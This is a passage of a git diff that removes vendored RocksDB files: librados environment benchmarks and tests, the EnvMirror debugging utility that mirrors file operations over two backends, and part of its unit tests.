-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s2 = db2->Write(WriteOptions(), &batch);
-    assert(s2.ok());
-  }
-  std::cout << "Time by librados : " << timer << "ms" << std::endl;
-  delete db2;
-}
-
-TEST_F(EnvLibradosTest, DBRandomRead) {
-  char key[20] = {0}, value[20] = {0};
-  int max_loop = 1 << 6;
-  int bulk_size = 1 << 10;
-  int read_loop = 1 << 20;
-  Timer timer(false);
-  std::cout << "Test size : keys_num(" << max_loop << ", " << bulk_size << "); read_loop(" << read_loop << ")" << std::endl;
-  /**********************************
-            use default env
-  ***********************************/
-  std::string kDBPath1 = "/tmp/DBRandomRead1";
-  DB* db1;
-  Options options1;
-  // Optimize Rocksdb. This is the easiest way to get RocksDB to perform well
-  options1.IncreaseParallelism();
-  options1.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options1.create_if_missing = true;
-
-  // open DB
-  Status s1 = DB::Open(options1, kDBPath1, &db1);
-  assert(s1.ok());
-
-  rocksdb::Random64 r1(time(nullptr));
-
-
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%019lld",
-               (long long)(i * bulk_size + j));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s1 = db1->Write(WriteOptions(), &batch);
-    assert(s1.ok());
-  }
-  timer.Reset();
-  int base1 = 0, offset1 = 0;
-  for (int i = 0; i < read_loop; ++i) {
-    base1 = r1.Uniform(max_loop);
-    offset1 = r1.Uniform(bulk_size);
-    std::string value1;
-    snprintf(key,
-             20,
-             "%019lld",
-             (long long)(base1 * bulk_size + offset1));
-    s1 = db1->Get(ReadOptions(), key, &value1);
-    assert(s1.ok());
-  }
-  std::cout << "Time by default : " << timer << "ms" << std::endl;
-  delete db1;
-
-  /**********************************
-            use librados env
-  ***********************************/
-  std::string kDBPath2 = "/tmp/DBRandomRead2";
-  DB* db2;
-  Options options2;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options2.IncreaseParallelism();
-  options2.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options2.create_if_missing = true;
-  options2.env = env_;
-
-  // open DB
-  Status s2 = DB::Open(options2, kDBPath2, &db2);
-  assert(s2.ok());
-
-  rocksdb::Random64 r2(time(nullptr));
-
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%019lld",
-               (long long)(i * bulk_size + j));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s2 = db2->Write(WriteOptions(), &batch);
-    assert(s2.ok());
-  }
-
-  timer.Reset();
-  int base2 = 0, offset2 = 0;
-  for (int i = 0; i < read_loop; ++i) {
-    base2 = r2.Uniform(max_loop);
-    offset2 = r2.Uniform(bulk_size);
-    std::string value2;
-    snprintf(key,
-             20,
-             "%019lld",
-             (long long)(base2 * bulk_size + offset2));
-    s2 = db2->Get(ReadOptions(), key, &value2);
-    if (!s2.ok()) {
-      std::cout << s2.ToString() << std::endl;
-    }
-    assert(s2.ok());
-  }
-  std::cout << "Time by librados : " << timer << "ms" << std::endl;
-  delete db2;
-}
-
-class EnvLibradosMutipoolTest : public testing::Test {
-public:
-  // we will use all of these below
-  const std::string client_name = "client.admin";
-  const std::string cluster_name = "ceph";
-  const uint64_t flags = 0;
-  const std::string db_name = "env_librados_test_db";
-  const std::string db_pool = db_name + "_pool";
-  const std::string wal_dir = "/wal";
-  const std::string wal_pool = db_name + "_wal_pool";
-  const size_t write_buffer_size = 1 << 20;
-  const char *keyring = "admin";
-  const char *config = "../ceph/src/ceph.conf";
-
-  EnvLibrados* env_;
-  const EnvOptions soptions_;
-
-  EnvLibradosMutipoolTest() {
-    env_ = new EnvLibrados(client_name, cluster_name, flags, db_name, config, db_pool, wal_dir, wal_pool, write_buffer_size);
-  }
-  ~EnvLibradosMutipoolTest() {
-    delete env_;
-    librados::Rados rados;
-    int ret = 0;
-    do {
-      ret = rados.init("admin"); // just use the client.admin keyring
-      if (ret < 0) { // let's handle any error that might have come back
-        std::cerr << "couldn't initialize rados! error " << ret << std::endl;
-        ret = EXIT_FAILURE;
-        break;
-      }
-
-      ret = rados.conf_read_file(config);
-      if (ret < 0) {
-        // This could fail if the config file is malformed, but it'd be hard.
-        std::cerr << "failed to parse config file " << config
-                  << "! error" << ret << std::endl;
-        ret = EXIT_FAILURE;
-        break;
-      }
-
-      /*
-       * next, we actually connect to the cluster
-       */
-
-      ret = rados.connect();
-      if (ret < 0) {
-        std::cerr << "couldn't connect to cluster! error " << ret << std::endl;
-        ret = EXIT_FAILURE;
-        break;
-      }
-
-      /*
-       * And now we're done, so let's remove our pool and then
-       * shut down the connection gracefully.
-       */
-      int delete_ret = rados.pool_delete(db_pool.c_str());
-      if (delete_ret < 0) {
-        // be careful not to
-        std::cerr << "We failed to delete our test pool!" << db_pool << delete_ret << std::endl;
-        ret = EXIT_FAILURE;
-      }
-      delete_ret = rados.pool_delete(wal_pool.c_str());
-      if (delete_ret < 0) {
-        // be careful not to
-        std::cerr << "We failed to delete our test pool!" << wal_pool << delete_ret << std::endl;
-        ret = EXIT_FAILURE;
-      }
-    } while (0);
-  }
-};
-
-TEST_F(EnvLibradosMutipoolTest, Basics) {
-  uint64_t file_size;
-  unique_ptr<WritableFile> writable_file;
-  std::vector<std::string> children;
-  std::vector<std::string> v = {"/tmp/dir1", "/tmp/dir2", "/tmp/dir3", "/tmp/dir4", "dir"};
-
-  for (size_t i = 0; i < v.size(); ++i) {
-    std::string dir = v[i];
-    std::string dir_non_existent = dir + "/non_existent";
-    std::string dir_f = dir + "/f";
-    std::string dir_g = dir + "/g";
-
-    ASSERT_OK(env_->CreateDir(dir.c_str()));
-    // Check that the directory is empty.
-    ASSERT_EQ(Status::NotFound(), env_->FileExists(dir_non_existent.c_str()));
-    ASSERT_TRUE(!env_->GetFileSize(dir_non_existent.c_str(), &file_size).ok());
-    ASSERT_OK(env_->GetChildren(dir.c_str(), &children));
-    ASSERT_EQ(0U, children.size());
-
-    // Create a file.
-    ASSERT_OK(env_->NewWritableFile(dir_f.c_str(), &writable_file, soptions_));
-    writable_file.reset();
-
-    // Check that the file exists.
-    ASSERT_OK(env_->FileExists(dir_f.c_str()));
-    ASSERT_OK(env_->GetFileSize(dir_f.c_str(), &file_size));
-    ASSERT_EQ(0U, file_size);
-    ASSERT_OK(env_->GetChildren(dir.c_str(), &children));
-    ASSERT_EQ(1U, children.size());
-    ASSERT_EQ("f", children[0]);
-
-    // Write to the file.
-    ASSERT_OK(env_->NewWritableFile(dir_f.c_str(), &writable_file, soptions_));
-    ASSERT_OK(writable_file->Append("abc"));
-    writable_file.reset();
-
-
-    // Check for expected size.
-    ASSERT_OK(env_->GetFileSize(dir_f.c_str(), &file_size));
-    ASSERT_EQ(3U, file_size);
-
-
-    // Check that renaming works.
-    ASSERT_TRUE(!env_->RenameFile(dir_non_existent.c_str(), dir_g.c_str()).ok());
-    ASSERT_OK(env_->RenameFile(dir_f.c_str(), dir_g.c_str()));
-    ASSERT_EQ(Status::NotFound(), env_->FileExists(dir_f.c_str()));
-    ASSERT_OK(env_->FileExists(dir_g.c_str()));
-    ASSERT_OK(env_->GetFileSize(dir_g.c_str(), &file_size));
-    ASSERT_EQ(3U, file_size);
-
-    // Check that opening non-existent file fails.
-    unique_ptr<SequentialFile> seq_file;
-    unique_ptr<RandomAccessFile> rand_file;
-    ASSERT_TRUE(
-      !env_->NewSequentialFile(dir_non_existent.c_str(), &seq_file, soptions_).ok());
-    ASSERT_TRUE(!seq_file);
-    ASSERT_TRUE(!env_->NewRandomAccessFile(dir_non_existent.c_str(), &rand_file,
-                                           soptions_).ok());
-    ASSERT_TRUE(!rand_file);
-
-    // Check that deleting works.
-    ASSERT_TRUE(!env_->DeleteFile(dir_non_existent.c_str()).ok());
-    ASSERT_OK(env_->DeleteFile(dir_g.c_str()));
-    ASSERT_EQ(Status::NotFound(), env_->FileExists(dir_g.c_str()));
-    ASSERT_OK(env_->GetChildren(dir.c_str(), &children));
-    ASSERT_EQ(0U, children.size());
-    ASSERT_OK(env_->DeleteDir(dir.c_str()));
-  }
-}
-
-TEST_F(EnvLibradosMutipoolTest, DBBasics) {
-  std::string kDBPath = "/tmp/DBBasics";
-  std::string walPath = "/tmp/wal";
-  DB* db;
-  Options options;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options.IncreaseParallelism();
-  options.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options.create_if_missing = true;
-  options.env = env_;
-  options.wal_dir = walPath;
-
-  // open DB
-  Status s = DB::Open(options, kDBPath, &db);
-  assert(s.ok());
-
-  // Put key-value
-  s = db->Put(WriteOptions(), "key1", "value");
-  assert(s.ok());
-  std::string value;
-  // get value
-  s = db->Get(ReadOptions(), "key1", &value);
-  assert(s.ok());
-  assert(value == "value");
-
-  // atomically apply a set of updates
-  {
-    WriteBatch batch;
-    batch.Delete("key1");
-    batch.Put("key2", value);
-    s = db->Write(WriteOptions(), &batch);
-  }
-
-  s = db->Get(ReadOptions(), "key1", &value);
-  assert(s.IsNotFound());
-
-  db->Get(ReadOptions(), "key2", &value);
-  assert(value == "value");
-
-  delete db;
-}
-
-TEST_F(EnvLibradosMutipoolTest, DBBulkLoadKeysInRandomOrder) {
-  char key[20] = {0}, value[20] = {0};
-  int max_loop = 1 << 6;
-  int bulk_size = 1 << 15;
-  Timer timer(false);
-  std::cout << "Test size : loop(" << max_loop << "); bulk_size(" << bulk_size << ")" << std::endl;
-  /**********************************
-            use default env
-  ***********************************/
-  std::string kDBPath1 = "/tmp/DBBulkLoadKeysInRandomOrder1";
-  std::string walPath = "/tmp/wal";
-  DB* db1;
-  Options options1;
-  // Optimize Rocksdb. This is the easiest way to get RocksDB to perform well
-  options1.IncreaseParallelism();
-  options1.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options1.create_if_missing = true;
-
-  // open DB
-  Status s1 = DB::Open(options1, kDBPath1, &db1);
-  assert(s1.ok());
-
-  rocksdb::Random64 r1(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%16lx",
-               (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s1 = db1->Write(WriteOptions(), &batch);
-    assert(s1.ok());
-  }
-  std::cout << "Time by default : " << timer << "ms" << std::endl;
-  delete db1;
-
-  /**********************************
-            use librados env
-  ***********************************/
-  std::string kDBPath2 = "/tmp/DBBulkLoadKeysInRandomOrder2";
-  DB* db2;
-  Options options2;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options2.IncreaseParallelism();
-  options2.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options2.create_if_missing = true;
-  options2.env = env_;
-  options2.wal_dir = walPath;
-
-  // open DB
-  Status s2 = DB::Open(options2, kDBPath2, &db2);
-  if (!s2.ok()) {
-    std::cerr << s2.ToString() << std::endl;
-  }
-  assert(s2.ok());
-
-  rocksdb::Random64 r2(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s2 = db2->Write(WriteOptions(), &batch);
-    assert(s2.ok());
-  }
-  std::cout << "Time by librados : " << timer << "ms" << std::endl;
-  delete db2;
-}
-
-TEST_F(EnvLibradosMutipoolTest, DBTransactionDB) {
-  std::string kDBPath = "/tmp/DBTransactionDB";
-  // open DB
-  Options options;
-  TransactionDBOptions txn_db_options;
-  options.create_if_missing = true;
-  options.env = env_;
-  TransactionDB* txn_db;
-
-  Status s = TransactionDB::Open(options, txn_db_options, kDBPath, &txn_db);
-  assert(s.ok());
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  std::string value;
-
-  ////////////////////////////////////////////////////////
-  //
-  // Simple OptimisticTransaction Example ("Read Committed")
-  //
-  ////////////////////////////////////////////////////////
-
-  // Start a transaction
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  assert(txn);
-
-  // Read a key in this transaction
-  s = txn->Get(read_options, "abc", &value);
-  assert(s.IsNotFound());
-
-  // Write a key in this transaction
-  s = txn->Put("abc", "def");
-  assert(s.ok());
-
-  // Read a key OUTSIDE this transaction. Does not affect txn.
-  s = txn_db->Get(read_options, "abc", &value);
-
-  // Write a key OUTSIDE of this transaction.
-  // Does not affect txn since this is an unrelated key.  If we wrote key 'abc'
-  // here, the transaction would fail to commit.
-  s = txn_db->Put(write_options, "xyz", "zzz");
-
-  // Commit transaction
-  s = txn->Commit();
-  assert(s.ok());
-  delete txn;
-
-  ////////////////////////////////////////////////////////
-  //
-  // "Repeatable Read" (Snapshot Isolation) Example
-  //   -- Using a single Snapshot
-  //
-  ////////////////////////////////////////////////////////
-
-  // Set a snapshot at start of transaction by setting set_snapshot=true
-  txn_options.set_snapshot = true;
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-
-  const Snapshot* snapshot = txn->GetSnapshot();
-
-  // Write a key OUTSIDE of transaction
-  s = txn_db->Put(write_options, "abc", "xyz");
-  assert(s.ok());
-
-  // Attempt to read a key using the snapshot.  This will fail since
-  // the previous write outside this txn conflicts with this read.
-  read_options.snapshot = snapshot;
-  s = txn->GetForUpdate(read_options, "abc", &value);
-  assert(s.IsBusy());
-
-  txn->Rollback();
-
-  delete txn;
-  // Clear snapshot from read options since it is no longer valid
-  read_options.snapshot = nullptr;
-  snapshot = nullptr;
-
-  ////////////////////////////////////////////////////////
-  //
-  // "Read Committed" (Monotonic Atomic Views) Example
-  //   --Using multiple Snapshots
-  //
-  ////////////////////////////////////////////////////////
-
-  // In this example, we set the snapshot multiple times.  This is probably
-  // only necessary if you have very strict isolation requirements to
-  // implement.
-
-  // Set a snapshot at start of transaction
-  txn_options.set_snapshot = true;
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-
-  // Do some reads and writes to key "x"
-  read_options.snapshot = txn_db->GetSnapshot();
-  s = txn->Get(read_options, "x", &value);
-  txn->Put("x", "x");
-
-  // Do a write outside of the transaction to key "y"
-  s = txn_db->Put(write_options, "y", "y");
-
-  // Set a new snapshot in the transaction
-  txn->SetSnapshot();
-  txn->SetSavePoint();
-  read_options.snapshot = txn_db->GetSnapshot();
-
-  // Do some reads and writes to key "y"
-  // Since the snapshot was advanced, the write done outside of the
-  // transaction does not conflict.
-  s = txn->GetForUpdate(read_options, "y", &value);
-  txn->Put("y", "y");
-
-  // Decide we want to revert the last write from this transaction.
-  txn->RollbackToSavePoint();
-
-  // Commit.
-  s = txn->Commit();
-  assert(s.ok());
-  delete txn;
-  // Clear snapshot from read options since it is no longer valid
-  read_options.snapshot = nullptr;
-
-  // Cleanup
-  delete txn_db;
-  DestroyDB(kDBPath, options);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as EnvMirror is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/env_mirror.cc b/thirdparty/rocksdb/utilities/env_mirror.cc
deleted file mode 100644
index 64c0b68..0000000
--- a/thirdparty/rocksdb/utilities/env_mirror.cc
+++ /dev/null
@@ -1,259 +0,0 @@
-// Copyright (c) 2015, Red Hat, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/env_mirror.h"
-
-namespace rocksdb {
-
-// An implementation of Env that mirrors all work over two backend
-// Env's.  This is useful for debugging purposes.
-class SequentialFileMirror : public SequentialFile {
- public:
-  unique_ptr<SequentialFile> a_, b_;
-  std::string fname;
-  explicit SequentialFileMirror(std::string f) : fname(f) {}
-
-  Status Read(size_t n, Slice* result, char* scratch) {
-    Slice aslice;
-    Status as = a_->Read(n, &aslice, scratch);
-    if (as == Status::OK()) {
-      char* bscratch = new char[n];
-      Slice bslice;
-      size_t off = 0;
-      size_t left = aslice.size();
-      while (left) {
-        Status bs = b_->Read(left, &bslice, bscratch);
-        assert(as == bs);
-        assert(memcmp(bscratch, scratch + off, bslice.size()) == 0);
-        off += bslice.size();
-        left -= bslice.size();
-      }
-      delete[] bscratch;
-      *result = aslice;
-    } else {
-      Status bs = b_->Read(n, result, scratch);
-      assert(as == bs);
-    }
-    return as;
-  }
-
-  Status Skip(uint64_t n) {
-    Status as = a_->Skip(n);
-    Status bs = b_->Skip(n);
-    assert(as == bs);
-    return as;
-  }
-  Status InvalidateCache(size_t offset, size_t length) {
-    Status as = a_->InvalidateCache(offset, length);
-    Status bs = b_->InvalidateCache(offset, length);
-    assert(as == bs);
-    return as;
-  };
-};
-
-class RandomAccessFileMirror : public RandomAccessFile {
- public:
-  unique_ptr<RandomAccessFile> a_, b_;
-  std::string fname;
-  explicit RandomAccessFileMirror(std::string f) : fname(f) {}
-
-  Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const {
-    Status as = a_->Read(offset, n, result, scratch);
-    if (as == Status::OK()) {
-      char* bscratch = new char[n];
-      Slice bslice;
-      size_t off = 0;
-      size_t left = result->size();
-      while (left) {
-        Status bs = b_->Read(offset + off, left, &bslice, bscratch);
-        assert(as == bs);
-        assert(memcmp(bscratch, scratch + off, bslice.size()) == 0);
-        off += bslice.size();
-        left -= bslice.size();
-      }
-      delete[] bscratch;
-    } else {
-      Status bs = b_->Read(offset, n, result, scratch);
-      assert(as == bs);
-    }
-    return as;
-  }
-
-  size_t GetUniqueId(char* id, size_t max_size) const {
-    // NOTE: not verified
-    return a_->GetUniqueId(id, max_size);
-  }
-};
-
-class WritableFileMirror : public WritableFile {
- public:
-  unique_ptr<WritableFile> a_, b_;
-  std::string fname;
-  explicit WritableFileMirror(std::string f) : fname(f) {}
-
-  Status Append(const Slice& data) override {
-    Status as = a_->Append(data);
-    Status bs = b_->Append(data);
-    assert(as == bs);
-    return as;
-  }
-  Status PositionedAppend(const Slice& data, uint64_t offset) override {
-    Status as = a_->PositionedAppend(data, offset);
-    Status bs = b_->PositionedAppend(data, offset);
-    assert(as == bs);
-    return as;
-  }
-  Status Truncate(uint64_t size) override {
-    Status as = a_->Truncate(size);
-    Status bs = b_->Truncate(size);
-    assert(as == bs);
-    return as;
-  }
-  Status Close() override {
-    Status as = a_->Close();
-    Status bs = b_->Close();
-    assert(as == bs);
-    return as;
-  }
-  Status Flush() override {
-    Status as = a_->Flush();
-    Status bs = b_->Flush();
-    assert(as == bs);
-    return as;
-  }
-  Status Sync() override {
-    Status as = a_->Sync();
-    Status bs = b_->Sync();
-    assert(as == bs);
-    return as;
-  }
-  Status Fsync() override {
-    Status as = a_->Fsync();
-    Status bs = b_->Fsync();
-    assert(as == bs);
-    return as;
-  }
-  bool IsSyncThreadSafe() const override {
-    bool as = a_->IsSyncThreadSafe();
-    assert(as == b_->IsSyncThreadSafe());
-    return as;
-  }
-  void SetIOPriority(Env::IOPriority pri) override {
-    a_->SetIOPriority(pri);
-    b_->SetIOPriority(pri);
-  }
-  Env::IOPriority GetIOPriority() override {
-    // NOTE: we don't verify this one
-    return a_->GetIOPriority();
-  }
-  uint64_t GetFileSize() override {
-    uint64_t as = a_->GetFileSize();
-    assert(as == b_->GetFileSize());
-    return as;
-  }
-  void GetPreallocationStatus(size_t* block_size,
-                              size_t* last_allocated_block) override {
-    // NOTE: we don't verify this one
-    return a_->GetPreallocationStatus(block_size, last_allocated_block);
-  }
-  size_t GetUniqueId(char* id, size_t max_size) const override {
-    // NOTE: we don't verify this one
-    return a_->GetUniqueId(id, max_size);
-  }
-  Status InvalidateCache(size_t offset, size_t length) override {
-    Status as = a_->InvalidateCache(offset, length);
-    Status bs = b_->InvalidateCache(offset, length);
-    assert(as == bs);
-    return as;
-  }
-
- protected:
-  Status Allocate(uint64_t offset, uint64_t length) override {
-    Status as = a_->Allocate(offset, length);
-    Status bs = b_->Allocate(offset, length);
-    assert(as == bs);
-    return as;
-  }
-  Status RangeSync(uint64_t offset, uint64_t nbytes) override {
-    Status as = a_->RangeSync(offset, nbytes);
-    Status bs = b_->RangeSync(offset, nbytes);
-    assert(as == bs);
-    return as;
-  }
-};
-
-Status EnvMirror::NewSequentialFile(const std::string& f,
-                                    unique_ptr<SequentialFile>* r,
-                                    const EnvOptions& options) {
-  if (f.find("/proc/") == 0) {
-    return a_->NewSequentialFile(f, r, options);
-  }
-  SequentialFileMirror* mf = new SequentialFileMirror(f);
-  Status as = a_->NewSequentialFile(f, &mf->a_, options);
-  Status bs = b_->NewSequentialFile(f, &mf->b_, options);
-  assert(as == bs);
-  if (as.ok())
-    r->reset(mf);
-  else
-    delete mf;
-  return as;
-}
-
-Status EnvMirror::NewRandomAccessFile(const std::string& f,
-                                      unique_ptr<RandomAccessFile>* r,
-                                      const EnvOptions& options) {
-  if (f.find("/proc/") == 0) {
-    return a_->NewRandomAccessFile(f, r, options);
-  }
-  RandomAccessFileMirror* mf = new RandomAccessFileMirror(f);
-  Status as = a_->NewRandomAccessFile(f, &mf->a_, options);
-  Status bs = b_->NewRandomAccessFile(f, &mf->b_, options);
-  assert(as == bs);
-  if (as.ok())
-    r->reset(mf);
-  else
-    delete mf;
-  return as;
-}
-
-Status EnvMirror::NewWritableFile(const std::string& f,
-                                  unique_ptr<WritableFile>* r,
-                                  const EnvOptions& options) {
-  if (f.find("/proc/") == 0) return a_->NewWritableFile(f, r, options);
-  WritableFileMirror* mf = new WritableFileMirror(f);
-  Status as = a_->NewWritableFile(f, &mf->a_, options);
-  Status bs = b_->NewWritableFile(f, &mf->b_, options);
-  assert(as == bs);
-  if (as.ok())
-    r->reset(mf);
-  else
-    delete mf;
-  return as;
-}
-
-Status EnvMirror::ReuseWritableFile(const std::string& fname,
-                                    const std::string& old_fname,
-                                    unique_ptr<WritableFile>* r,
-                                    const EnvOptions& options) {
-  if (fname.find("/proc/") == 0)
-    return a_->ReuseWritableFile(fname, old_fname, r, options);
-  WritableFileMirror* mf = new WritableFileMirror(fname);
-  Status as = a_->ReuseWritableFile(fname, old_fname, &mf->a_, options);
-  Status bs = b_->ReuseWritableFile(fname, old_fname, &mf->b_, options);
-  assert(as == bs);
-  if (as.ok())
-    r->reset(mf);
-  else
-    delete mf;
-  return as;
-}
-
-}  // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/utilities/env_mirror_test.cc b/thirdparty/rocksdb/utilities/env_mirror_test.cc
deleted file mode 100644
index 2bf8ec8..0000000
--- a/thirdparty/rocksdb/utilities/env_mirror_test.cc
+++ /dev/null
@@ -1,222 +0,0 @@
-//  Copyright (c) 2015, Red Hat, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/env_mirror.h"
-#include "env/mock_env.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class EnvMirrorTest : public testing::Test {
- public:
-  Env* default_;
-  MockEnv* a_, *b_;
-  EnvMirror* env_;
-  const EnvOptions soptions_;
-
-  EnvMirrorTest()
-      : default_(Env::Default()),
-        a_(new MockEnv(default_)),
-        b_(new MockEnv(default_)),
-        env_(new EnvMirror(a_, b_)) {}
-  ~EnvMirrorTest() {
-    delete env_;
-    delete a_;
-    delete b_;
-  }
-};
-
-TEST_F(EnvMirrorTest, Basics) {
-  uint64_t file_size;
-  unique_ptr<WritableFile> writable_file;
-  std::vector<std::string> children;
-
-  ASSERT_OK(env_->CreateDir("/dir"));
-
-  // Check that the directory is empty.
-  ASSERT_EQ(Status::NotFound(), env_->FileExists("/dir/non_existent"));
-  ASSERT_TRUE(!env_->GetFileSize("/dir/non_existent", &file_size).ok());
-  ASSERT_OK(env_->GetChildren("/dir", &children));
-  ASSERT_EQ(0U, children.size());
-
-  // Create a file.
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  writable_file.reset();
-
-  // Check that the file exists.
-  ASSERT_OK(env_->FileExists("/dir/f"));
-  ASSERT_OK(a_->FileExists("/dir/f"));
-  ASSERT_OK(b_->FileExists("/dir/f"));
-  ASSERT_OK(env_->GetFileSize("/dir/f", &file_size));
-  ASSERT_EQ(0U, file_size);
-  ASSERT_OK(env_->GetChildren("/dir", &children));
-  ASSERT_EQ(1U, children.size());
-  ASSERT_EQ("f", children[0]);
-  ASSERT_OK(a_->GetChildren("/dir", &children));
-  ASSERT_EQ(1U, children.size());
-  ASSERT_EQ("f", children[0]);
-  ASSERT_OK(b_->GetChildren("/dir", &children));
-  ASSERT_EQ(1U, children.size());
-  ASSERT_EQ("f", children[0]);
-
-  // Write to the file.
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("abc"));
-  writable_file.reset();
-
-  // Check for expected size.
-  ASSERT_OK(env_->GetFileSize("/dir/f", &file_size));
-  ASSERT_EQ(3U, file_size);
-  ASSERT_OK(a_->GetFileSize("/dir/f", &file_size));
-  ASSERT_EQ(3U, file_size);
-  ASSERT_OK(b_->GetFileSize("/dir/f", &file_size));
-  ASSERT_EQ(3U, file_size);
-
-  // Check that renaming works.
-  ASSERT_TRUE(!env_->RenameFile("/dir/non_existent", "/dir/g").ok());
-  ASSERT_OK(env_->RenameFile("/dir/f", "/dir/g"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists("/dir/f"));
-  ASSERT_OK(env_->FileExists("/dir/g"));
-  ASSERT_OK(env_->GetFileSize("/dir/g", &file_size));
-  ASSERT_EQ(3U, file_size);
-  ASSERT_OK(a_->FileExists("/dir/g"));
-  ASSERT_OK(a_->GetFileSize("/dir/g", &file_size));
-  ASSERT_EQ(3U, file_size);
-  ASSERT_OK(b_->FileExists("/dir/g"));
-  ASSERT_OK(b_->GetFileSize("/dir/g", &file_size));
-  ASSERT_EQ(3U, file_size);
-
-  // Check that opening non-existent file fails.
-  unique_ptr<SequentialFile> seq_file;
-  unique_ptr<RandomAccessFile> rand_file;
-  ASSERT_TRUE(
-      !env_->NewSequentialFile("/dir/non_existent", &seq_file, soptions_).ok());
-  ASSERT_TRUE(!seq_file);
-  ASSERT_TRUE(!env_->NewRandomAccessFile("/dir/non_existent", &rand_file,
-                                         soptions_).ok());
-  ASSERT_TRUE(!rand_file);
-
-  // Check that deleting works.
-  ASSERT_TRUE(!env_->DeleteFile("/dir/non_existent").ok());
-  ASSERT_OK(env_->DeleteFile("/dir/g"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists("/dir/g"));
-  ASSERT_OK(env_->GetChildren("/dir", &children));
-  ASSERT_EQ(0U, children.size());
-  ASSERT_OK(env_->DeleteDir("/dir"));
-}
-
-TEST_F(EnvMirrorTest, ReadWrite) {
-  unique_ptr<WritableFile> writable_file;
-  unique_ptr<SequentialFile> seq_file;
-  unique_ptr<RandomAccessFile> rand_file;
-  Slice result;
-  char scratch[100];
-
-  ASSERT_OK(env_->CreateDir("/dir"));
-
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("hello "));
-  ASSERT_OK(writable_file->Append("world"));
-  writable_file.reset();
-
-  // Read sequentially.
-  ASSERT_OK(env_->NewSequentialFile("/dir/f", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(5, &result, scratch));  // Read "hello".
-  ASSERT_EQ(0, result.compare("hello"));
-  ASSERT_OK(seq_file->Skip(1));
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));  // Read "world".
-  ASSERT_EQ(0, result.compare("world"));
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));  // Try reading past EOF.
-  ASSERT_EQ(0U, result.size());
-  ASSERT_OK(seq_file->Skip(100));  // Try to skip past end of file.
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));
-  ASSERT_EQ(0U, result.size());
-
-  // Random reads.
-  ASSERT_OK(env_->NewRandomAccessFile("/dir/f", &rand_file, soptions_));
-  ASSERT_OK(rand_file->Read(6, 5, &result, scratch));  // Read "world".
-  ASSERT_EQ(0, result.compare("world"));
